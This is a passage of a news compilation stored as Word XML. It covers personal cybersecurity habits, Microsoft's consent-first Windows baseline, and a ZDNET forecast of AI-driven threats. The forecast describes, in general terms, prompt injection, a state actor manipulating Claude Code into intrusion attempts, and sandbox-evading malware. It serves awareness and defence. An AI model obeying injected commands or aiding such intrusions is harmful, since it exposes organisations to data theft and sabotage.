          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.infoworld.com/article/4133804/flaws-in-four-popular-vs-code-extensions-left-128-million-installs-open-to-attack-2.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>10 Must-Follow Cybersecurity Habits in 2026 to Protect Data and Prevent Hacks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Glanze Patrick Published 02/11/26 AT 8:11 AM EST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Person Using Smartphone for Authentication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Cybersecurity habits are no longer optional as AI-driven attacks, deepfakes, and ransomware target individuals and businesses daily. In 2026, securing online accounts, devices, and networks requires proactive strategies such as multi-factor authentication, behavioral biometrics, and passkeys that resist quantum-era threats. With billions of connected devices and increasingly sophisticated attacks, adopting consistent digital safety practices ensures sensitive information remains protected while reducing breach risks and financial losses.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Digital safety integrates zero-trust frameworks, endpoint detection, and network segmentation to protect hybrid workforces, IoT devices, and personal data. Routine habits like automatic updates, encrypted communication, and systematic backups form the backbone of a resilient defense. Establishing these habits minimizes exposure to phishing, polymorphic malware, and identity theft, creating a foundation of security for individuals and organizations navigating the 2026 threat landscape.Cybersecurity Habits: 10 Core Online Security Practices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Adopting these cybersecurity habits strengthens digital defense and reduces the risk of account compromise: Enable Multi-Factor Authentication (MFA) Everywhere: Passkeys, authenticator apps, and hardware security keys protect accounts from 99.9% of takeovers. SMS-based MFA is vulnerable to SIM swaps, making modern authentication critical for financial and personal platforms.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use a Password Manager: Generating 20+ character unique passwords for each account prevents reuse and minimizes breach exposure. Managers also provide autofill convenience, dark web monitoring, and alerts for leaked credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Automatic Updates for OS and Apps: Regular patching of software, operating systems, and firmware closes zero-day vulnerabilities. Delayed updates increase ransomware risk and exploit windows, so automation is key. Full Disk Encryption: Encrypting devices with BitLocker, FileVault, or VeraCrypt protects data if hardware is lost or stolen. Encrypted drives maintain confidentiality against unauthorized access during physical theft. Use a VPN on Public Wi-Fi: WireGuard or OpenVPN encrypts traffic to prevent session hijacking and ISP tracking in cafes, airports, or hotels. A VPN shields credentials and sensitive communications from eavesdropping. Antivirus and Endpoint Detection (EDR): Real-time behavioral analysis blocks phishing payloads, malware, and zero-day exploits. AI-powered solutions scan thousands of daily threats to protect both work and personal devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Backup Using the 3-2-1 Rule: Maintain three copies of data across two mediums and one offsite or immutable storage. Regularly test restores to ensure recovery from ransomware or accidental deletion.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Verify Links and Attachments: Hover over URLs and inspect sender domains before clicking. Email and messaging scams exploit urgency, emotional manipulation, or fake certificates to trick users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Secure Your Home Network: Enable WPA3 encryption, change default passwords, and segment IoT devices with VLANs. Firmware updates and disabling UPnP reduce network exposure to external threats.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Freeze Credit and Monitor Identity: Regular credit freezes and dark web monitoring prevent unauthorized financial accounts. Weekly checks alert users to identity theft or fraudulent activity before significant damage occurs.Online Security Tips: Authentication, Updates, and Encryption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Modern online security tips emphasize layered protection through MFA, automatic updates, and encryption. Passkeys and FIDO2 standards provide phishing-resistant authentication, while email and banking accounts remain safeguarded against account takeovers.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Automatic OS, application, and router updates close critical vulnerabilities, preventing malware infiltration and ransomware attacks. Encryption of messaging apps, browsers, and DNS queries ensures private communication and metadata minimization. Consistent implementation of these tips maintains defense-in-depth, stopping lateral movement and reducing breach likelihood.Digital Safety Practices: VPN, Backups, and Network Security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VPN adoption secures online traffic on public networks, with WireGuard or Mullvad offering fast, no-log connections and kill-switch features. Implementing the 3-2-1 backup strategy ensures data can be restored even after ransomware incidents or device failure.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Home networks benefit from segmentation, firewall use, and minimizing remote access to reduce attack surfaces. Phishing-resistant email filters, safe browsing practices, and ad-blocking extensions enhance daily protection. Device management, such as geofencing, remote wipe, and notifications, adds an additional layer of safety across personal and business technology.Cybersecurity Habits: Network Monitoring and Identity Protection 2026</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Active monitoring of networks and accounts provides early warning for breaches and anomalous activity. Endpoint detection systems analyze patterns, block suspicious behavior, and alert users to potential compromises. Identity protection tools track dark web exposure, alerting users to credential leaks and fraudulent activity. Maintaining these habits, combined with encryption, backups, and MFA, ensures that individuals and organizations remain secure in the evolving 2026 threat landscape.Cybersecurity Awareness in 2026: Building Lasting Digital Habits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Cybersecurity in 2026 requires a proactive, layered approach across authentication, device management, network security, and identity monitoring. Routine practice of MFA, strong password management, automatic updates, VPN use, backups, and encryption reduces breach risk and ensures digital continuity.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Awareness and adherence to these 10 core habits safeguard personal information, financial assets, and organizational data, creating a culture of cybersecurity hygiene in an increasingly connected world.Frequently Asked Questions1. How often should I update my passwords?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Passwords should be updated whenever a service notifies of a breach. Using a password manager allows you to generate unique, complex passwords without memorization. Critical accounts like email and banking should prioritize frequent updates. Avoid reusing old passwords to reduce exposure to automated attacks.2. Are VPNs necessary if I use home Wi-Fi?</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Even home Wi-Fi networks benefit from VPN use, especially with IoT devices. VPNs encrypt traffic, preventing ISPs or attackers from intercepting data. It adds protection against malware-infected devices on the same network. For remote work, a VPN ensures secure access to corporate resources.3. What is the most effective way to prevent phishing attacks?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Combining email filters, link verification, and MFA provides strong protection. Hovering over URLs and checking sender domains helps avoid malicious links. Employee or personal awareness training reduces human error risk. Regular software updates ensure known vulnerabilities used in phishing attacks are patched.4. How do I know if my backup strategy is effective?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3-2-1 backup approach ensures redundancy across multiple mediums and offsite storage. Regularly test restores to confirm data integrity. Immutable backups prevent ransomware encryption or deletion. Monitoring backup logs helps identify failures before critical loss occurs.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Originally published on Tech Times</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>International Business Times 2026.02.11 17:45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.ibtimes.com/10-must-follow-cybersecurity-habits-2026-protect-data-prevent-hacks-3797149</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Microsoft to roll out a 'consent first' model to protect Windows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Feb 10, 2026</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 AI agents and autonomous apps multiply, Microsoft is resetting Windows' default trust model, requiring user consent and exposing once-invisible behavior.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Windows serves as the backbone of enterprises around the world, powering more than a billion devices and supporting millions of apps. However Microsoft acknowledges that apps are increasingly going rogue, overriding settings, installing additional components, or altering critical Windows capabilities without user awareness or approval.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response, the tech giant plans to roll out what it calls a "consent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>first" model. This new default baseline will grant access only to explicitly approved apps, although users will retain full control to permit, deny, or reverse permission decisions. They will also be given full visibility into app and agent behavior.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is a direct response to real-world abuse of misconfigured endpoints, credential theft via user-level execution, and post-exploitation living-off- the-land techniques," said Ensar Seker, CISO at SOCRadar.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control, without losing transparency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With Windows Baseline Security Mode, runtime safeguards will be enabled by default and will only allow "properly signed" apps, services, and drivers to run. However, users and admins will be able to override these safeguards for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>specific apps when needed, and they will have visibility into what protections are active and whether any exceptions have been granted. The goal, Microsoft notes, is to help protect the system from "tampering or unauthorized changes."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addition, through new transparency and consent measures, users will receive prompts when apps attempt to access their sensitive data and resources, such as files, cameras, or microphones, or when they attempt to install other "unintended software." Users can grant or deny app requests to access their protected data and hardware, and can also choose to revoke previously-granted permissions.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Microsoft calls this a "more consistent and intuitive approach" to how Windows communicates security decisions. The company says these new measures are a direct response to customers calling for "stronger, more consistent security foundations" in the company's operating system (OS).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"Windows must both remain an open platform and be secure by default - protecting the integrity of your experience regardless of the apps installed," Logan Iyer, Windows Platform developer, wrote in a blog post.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Microsoft emphasized that it has a "long-standing tradition as an open platform," and will "continue to preserve what has made it successful: Freedom to install any app and openness to every developer." Microsoft is in early stages with partners, devs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Microsoft says it will roll out these new measures in a "phased approach guided by clear principles," although the company doesn't provide more specific details on what that will look like for enterprises, or when they might expect the changes to take effect. The tech giant declined to provide further details to Computerworld.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Microsoft did say that it will provide tools and APIs to streamline adoption, and give users and IT admins visibility into how apps and agents behave in their systems. Existing "well-behaved" apps will work as usual, giving devs "the time and runway" to adhere to stronger security and privacy measures. The company is working with developers and partners, including CrowdStrike, OpenAI, Adobe, 1Password, and Raycast, on these initiatives.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"Microsoft is moving security posture left and down the stack by making baseline protections the default rather than an opt-in," noted SOCRadar's Seker. What stands out, he noted, is the "[explicit pairing of a] hardened default configuration with user-visible transparency and consent," rather than silent control enforcement.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signals a shift from ‘security by policy' to ‘security by design and expectation,' especially at the OS level where many organizations historically under-invest," said Seker.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Baseline security is no longer invisible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David Shipley of Beauceron Security called Microsoft's new security and visibility measures a great idea.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is going to help curtail a whole world of hurt that threat actors are able to access way too easily, which is a huge win," he said. Default secure behavior is critical, particularly given the agentic AI gold rush, which would be 10 times worse if the standard was non-secure by default.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 think it's that agentic AI push that's finally caused someone to go, ‘Hey we need to put this fire out before we start another one,'" said Shipley.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locking down common attack paths early, Microsoft is aiming to reduce the blast radius of phishing, initial access malware, and unmanaged privilege escalation, noted SocRadar's Seker. This is particularly important in hybrid work and BYOD-adjacent environments, where endpoint consistency is weak.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biggest advantage is eliminating the ‘secure but never deployed' problem," said Seker. On by default baselines can dramatically reduce time- to-protection and decision fatigue for IT teams, he noted.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he pointed out, enterprises must be wary of challenges with friction: legacy apps, power users, and niche workflows may break or require exceptions. And, if those exceptions aren't tightly governed, the same security gaps may be recreated and become even more complex.</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Leaders should treat this shift as a "forcing function" to clean up endpoint sprawl, undocumented dependencies, and informal admin privileges, Seker advised. Preparation means testing baselines in realistic pilot groups, mapping exception workflows in advance, and aligning helpdesk teams so security controls don't roll back due to user pressure.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"Strategically, this is less about a Windows feature and more about accepting that baseline security is no longer optional or invisible," said Seker.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Taryn Plumb</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Taryn Plumb is a freelance writer specializing in AI and cybersecurity. She has also written about data infrastructure, quantum computing, networking hardware and software, and the metaverse. In a previous life she was a news and features reporter for The Boston Globe and numerous other outlets and business journals. She is also the author of several regional history books.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ComputerWorld 2026.02.11 04:41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.computerworld.com/article/4130492/microsoft-to-roll-out-a-consent-first-model-to-protect-windows.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>10 ways AI can inflict unprecedented damage in 2026</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year's cybersecurity threat landscape will be much, much worse than last year, experts warn. Here are 10 areas of vulnerability that deserve every business leader's attention in 2026.</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Written by David Berlind, Senior Contributing Editor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Senior Contributing Editor Jan. 25, 2026 at 3:00 a.m. PT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Reviewed by David Grober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MirageC/Moment/Getty Images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Follow ZDNET: Add us as a preferred source on Google.ZDNET's key takeaways In 2026, weaponized AI will cause unprecedented harm.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Malicious AI agents will evade detection as they roam networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CISOs must upskill their teams to deal with AI-related threats.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Looking back at the biggest cybersecurity breaches and intrusions of 2025, here's what I wonder: Will those trends continue unabated into the new year? Or, will 2026 be full of new surprises as threat actors attempt to stay one step ahead of the cybersecurity pros trying to anticipate their next move?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the threat intelligence and cybersecurity experts I've talked to, it's likely to be a bit of each. And it should come as no surprise that artificial intelligence topped the threat list for many researchers.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this report, I checked in with seven organizations, all trusted sources for my cybersecurity reporting during 2025.]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Threat actors started using AI in 2025. It'll get much worse in 2026</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weaponization of AI in 2025 appears poised to turn an evolutionary corner in 2026, making previous generations of malware appear benign by comparison.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2026 and beyond, threat actor use of AI is expected to transition decisively from the exception to the norm, noticeably transforming the cyber threat landscape," noted security leaders at Google's Mandiant and Threat Intelligence Group (GTIG). "We anticipate that actors will fully leverage AI to enhance the speed, scope, and effectiveness of operations, building upon the robust evidence and novel use cases observed in 2025. This includes social engineering, information operations, and malware development."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"Additionally," Google continued, "we anticipate threat actors will increasingly adopt agentic systems to streamline and scale attacks by automating steps across the attack lifecycle. We may also begin to see other AI threats increasingly being discussed in security research, such as prompt injection and direct targeting of the models themselves."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Threat actors are learning the technology and setting the bar.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LastPass' Kosak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Floris Dankaart, lead product manager in NCC's Managed Extended Detection and Response Group, said: "2025 marked the first large-scale AI- orchestrated cyber espionage campaign, where Anthropic's Claude was used to infiltrate global targets. It was already apparent that tools for such a campaign were being developed (for example, "Villager"). This trend will continue in 2026, and AI's use as a sword will be followed by an increase in AI's use as a shield."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Across various sites, Villager is discussed as the likely AI-native heir to the Cobalt Strike throne. Cobalt Strike is an automated penetration-testing tool widely used by cybersecurity pros to emulate threat actor behavior and gauge an organization's responses upon detection. Unfortunately, Cobalt Strike was also weaponized by malicious actors.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contrast to Cobalt Strike, however, Villager has AI in its DNA and is therefore viewed by the cybersecurity community as a more capable alternative. However, much the same way Cobalt Strike has been weaponized for illicit activities, Villager could be poised to do as much, if not more, harm than good. This is especially true given Villager's Chinese origins. China is well-known for its sprawling cyber-espionage initiatives, and there's a distinct possibility that Villager was developed with the intent to do more harm than good.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Anthropic's recent report on a Chinese nation-state threat actor's use of AI in a campaign lacked details, it demonstrated the continued evolutionary role of AI in attack chains and was the simplest attack we'll see moving into the future," noted LastPass senior principal analyst Mike Kosak. According to Kosak, the cybersecurity community is already off to a bad start in its attempts to stay one step ahead of malicious actors. "Right now, threat actors are learning the technology and setting the bar," he said.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all, my conversations with threat intelligence and cybersecurity experts identified 10 areas of vulnerability that deserve every business leader's attention in 2026. 1. AI-enabled malware will unleash havoc</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2025 was a pivotal year for AI-enabled malware, a category of malware that is noteworthy for either preying on victims' use of AI or using AI itself to conduct its malicious activities. In November 2025, GTIG published a summary of its AI-involved malware observations, noting that "adversaries are no longer leveraging AI just for productivity gains; they are deploying novel AI-enabled malware in active operations." That shift, according to GTIG, "marks a new operational phase of AI abuse, involving tools that dynamically alter behavior mid-execution."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report goes on to identify several such malware by name, including Fruitshell, Promptflux, Promptlock, and PromptSteal, the last of which has been observed in the wild using a large language model (LLM) to generate one-line PowerShell commands capable of finding and exfiltrating sensitive data from Windows-based computers.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2026, threat actors will increasingly deploy AI-enabled malware in active operations," noted LastPass cyber threat intelligence analyst Stephanie Schneider. "This AI can generate scripts, alter codes to avoid detection, and create malicious functions on demand. Nation-state actors have used AI-powered malware to adapt, alter, and pivot campaigns in real- time, and these campaigns are expected to improve as the technology continues to develop. AI-powered malware will likely become more autonomous in 2026, ultimately increasing the threat landscape for defenders."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Malicious code is predicted to become increasingly 'self-aware.'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Picus Security's жzarslan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It's that ability of AI-enabled malware to dynamically adapt, morph, and change attack strategies that is extremely worrisome. At the very least, human defenders are dealing with their own species when battling against the wits and speed of other humans. But those defenders will increasingly find themselves at a significant speed and scale disadvantage once a threat actor's payload can autonomously adapt to countermeasures and to human presence at machine speeds.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"Malicious code is predicted to become increasingly 'self-aware,' utilizing advanced calculations to verify the presence of a human user before executing," Picus Security co-founder and VP SЭleyman жzarslan told ZDNET. "Instead of blindly detonating, malware will likely analyze interaction patterns to distinguish between actual humans and automated analysis environments. This evolution suggests that automated sandboxes will face significant challenges, as threats will simply remain dormant or 'play dead' upon detecting the sterile inputs typical of security tools, executing only when convinced they are unobserved."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 Agentic AI is evolving into every threat actor's fantasy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AI-enabled malware is of grave concern, the growing reliance of threat actors on agentic AI also warrants significant attention. According to the aforementioned report from Anthropic, the Claude LLM developer discovered how attackers were using agentic AI to execute their cyberattacks.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threat actor - whom we assess with high confidence was a Chinese state- sponsored group - manipulated our Claude Code tool into attempting infiltration into roughly 30 global targets and succeeded in a small number of cases," wrote the authors of Anthropic's report. "The operation targeted large tech companies, financial institutions, chemical manufacturing companies, and government agencies. We believe this is the first documented case of a large-scale cyberattack executed without substantial human intervention."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Alex Cox, director of Threat Intelligence, Mitigation, and Escalation at LastPass, echoed that warning: "Defenders will likely see threat actors use agentic AI in an automated fashion as part of intrusion activities, continue AI-driven phishing campaigns, and continue development of advanced AI-enabled malware. They'll use agentic AI to implement hacking agents that support their campaigns through autonomous work. In 2026, attackers will shift from passive use of AI in preparation activities to automation of campaigns and the evolution of their tactics, techniques, and procedures (TTPs)."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There'll be increased pressure from users expecting AI agents to become more powerful.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AppOmn's Ruzzi</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From the threat actor's point of view, agentic AI seems nearly purpose- built for one key malicious TTP: lateral movement. According to a CrowdStrike post, "Lateral movement refers to the techniques that a cyberattacker uses, after gaining initial access, to move deeper into a network in search of sensitive data and other high-value assets. After entering the network, the attacker maintains ongoing access by moving through the compromised environment and obtaining increased privileges using various tools. It allows a threat actor to avoid detection and retain access, even if discovered on the machine that was first infected. And with a protracted dwell time, data theft might not occur until weeks or even months after the original breach."</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It's not hard to imagine how agentic AI could be a threat actor's fantasy when coupled with such lateral movement.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"AI is both the biggest accelerator and the biggest wildcard. Threat actors will increasingly use AI agents to automate reconnaissance, phishing, lateral movement, and malware development, making attacks faster, adaptive, and harder to detect," wrote NCC director Nigel Gibbons.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Perhaps one of the biggest fears related to agentic AI will be the extent to which end users may inadvertently expose sensitive information and assets during the deployment of their own agents without IT oversight.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2026, we expect the proliferation of sophisticated AI Agents will escalate the shadow AI problem into a critical 'shadow agent' challenge. In organizations, employees will independently deploy these powerful, autonomous agents for work tasks, regardless of corporate approval," wrote Google's cybersecurity experts. "This will create invisible, uncontrolled pipelines for sensitive data, potentially leading to data leaks, compliance violations, and IP theft."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Unfortunately, banning agentic AI will not be an option. Between its promise of delivering greatly improved efficiency and executive pressure to derive competitive advantage from AI, end-users will likely respond by taking matters into their own hands if they're not sufficiently enabled by their IT departments.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AppOmni director of AI Melissa Ruzzi, there will be "increased pressure from users expecting AI agents to become more powerful, and organizations under pressure to develop and release agents to production as fast as possible. And it will be especially true for AI agents running in SaaS environments, where sensitive data is likely already present and misconfigurations may already pose a risk."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 Prompt injection: AI tools will be the new attack surface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to Google's point about how agentic AI deployments may lead to new "data leaks, compliance violations, and IP theft," any time new, supplemental platforms are layered onto an organization's existing IT stack, that organization will need to deal with an expansion in vulnerable surface areas.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"By trying to make AI as powerful as it can be, organizations may misconfigure settings, leading to overpermissions and data exposure. They may also grant too much power to one AI, creating a major single point of failure," wrote AppOmni's Ruzzi. "In 2026, we'll see other AI security risks heighten even more, stemming from excessive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>permissions granted to AI and a lack of instructions provided to it about how to choose and use tools, potentially leading to data breaches."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Meanwhile, AI-enabled malware might not be possible were it not for the incremental surface area created by organizational or shadow IT adoption of large language models.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Prompt injection isn't just a future threat; it's a present danger.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Google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AI promises unprecedented growth, it also introduces new, sophisticated risks. One of the most critical is prompt injection, a cyberattack that essentially manipulates AI, making it bypass its security protocols and follow an attacker's hidden command," wrote Google's cybersecurity leaders. "This isn't just a future threat; it's a present danger, and we anticipate a significant rise in these attacks throughout 2026. The increasing accessibility of powerful AI models and the growing number of businesses integrating them into daily operations create perfect conditions for prompt injection attacks. Threat actors are rapidly refining their techniques, and the low-cost, high-reward nature of these attacks makes them an attractive option. We anticipate a rise in targeted attacks on enterprise AI systems in 2026, as attackers move from proof-of-concept exploits to large-scale data exfiltration and sabotage campaigns."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many cases, the sanctioned or unsanctioned introduction of AI as a supplemental platform introduces a far more passive form of surface area - the one created when untrained users feed proprietary corporate information into a publicly shared LLM. Such was the case when Samsung engineers prompted ChatGPT with sensitive source code, thereby exposing that code to the wider community of ChatGPT users. According to Dark Reading, one of the engineers "pasted buggy source code from a semiconductor database into ChatGPT, with a prompt to the chatbot to fix the errors." The Dark Reading post goes on to describe how "information ends up as training data for the [LLM in a way that] someone could later retrieve the data using the right prompts." In other words, through such misprompting, the organization's vulnerable surface area is expanded to include public services beyond its control.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2026 is also the year during which the fusion of AI to web browsers could present new defense challenges. Between new entries into the market - such as ChatGPT's Atlas and the transformation of existing entries like Chrome, Edge, and Firefox into AI front-ends - SquareX founder Vivek Ramachandran sees their adoption as fait accompli.</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"Even if advisory firms like Gartner caution against using these tools inside corporate environments, history suggests adoption will be inevitable - security has never been able to fully stop productivity-driven tool adoption, especially when companies feel pressured to use the 'latest and greatest' to keep up," Ramachandran told ZDNET.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"AI browsers will become the default, not a niche category," he continued. "They'll introduce a new and unusually powerful attack surface because they blend browsing with autonomous actions, sensitive corporate context with external content, and agent-driven decisions with execution capability. This shift will create a major headache for existing enterprise security solutions, because most security stacks today were not designed for browsers that act like agents."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 Threat actors will use AI to go after the weakest link - humans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Threat actors are still having a relatively easy time with attacks that start as social engineering campaigns but end with extremely damaging credential thefts. However, in 2026, almost as if to take their social engineering TTPs to an entirely new level, threat actors are expected to enhance their social engineering efforts with AI.</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2026, we anticipate sophisticated threat actors like ShinyHunters (aka, UNC6240) will accelerate the use of highly manipulative AI-enabled social engineering, making it a significant threat," noted Google cybersecurity leaders. "The key to their success in 2025 was avoiding technical exploits and instead focusing on human weaknesses, particularly through voice phishing. Vishing is poised to incorporate AI-driven voice cloning to create hyperrealistic impersonations, notably of executives or IT staff. This approach will be exacerbated by the increasing use of AI in other aspects of social engineering. This includes reconnaissance, background research, and the crafting of realistic phishing messages. AI allows for scalable, customized attacks that bypass traditional security tools, as the focus is on human weaknesses rather than the technology stack."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70% of confirmed healthcare fraud now originates from bots.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Pindrop's Balasubramaniyan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Pindrop CEO and co-founder Vijay Balasubramaniyan, 70% of confirmed healthcare fraud now originates from bots. The bot activity was bad enough. But once AI is added as a main ingredient, Balasubramaniyan anticipates things will get a lot worse.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"Bot activity surged 9,600% in the second half of 2025 across some of our largest customers, demonstrating how quickly AI-based fraud scales once deployed," he told ZDNET. "In 2026, I predict that the majority of enterprise fraud will originate from interactions with AI-driven bots capable of natural conversation, real-time social engineering, and automated account takeover. Instead of isolated human attacks, intelligent AI bots are probing systems, interacting with humans, and draining accounts continuously."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 AI will expose APIs as a too-easily-exploited point of attack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While humans will always be the weakest link in any system, application programming interfaces (APIs) may not be far behind - especially undocumented or unofficial ones. The tasklet.ai AI agent authoring and hosting service, for example, can create AI agents of just about any kind (relying on just about any service). That capability is enabled, surprisingly, by an even more impressive superpower - its ability to automatically discover and leverage just about any API. As tasklet founder Andrew Lee described it to me, if tasklet needs access to a service in order to launch an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>AI agent, that service doesn't necessarily need to offer an API that was intentionally designed to offer programmatic access. Tasklet just relies on AI to figure it out.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Does this sound trivial? I assure you that it's not. Over the last 15 years, billions have been spent on the art of developer relations and on delivering the best possible developer experiences (DXs) to maximize the consumability of APIs and grease the wheels of software integration and composable applications. Even the innovation of the model context protocol (MCP) was a response to the need for better DXs for universal programmatic access between software and AI. But if you heard Andrew Lee explain how tasklet works, you'd soon realize that the idea of APIs, MCP, and optimal DXs is probably dead.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Not only does tasklet independently figure out how to programmatically access a service (again, even when APIs for that service don't exist), it automatically builds and hosts the integration - in the context of agentic AI. I spent 15 years doing meaningful work in the belly of the API economy. Or so I thought. When I saw tasklet for the first time, I immediately wondered if all that work was a complete waste of time.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Here's the point: If Andrew Lee at tasklet can do it, so can threat actors. After seeing how tasklet works, it's not hard to imagine them harnessing AI to not only discover your programmable interfaces (whether you know about them or 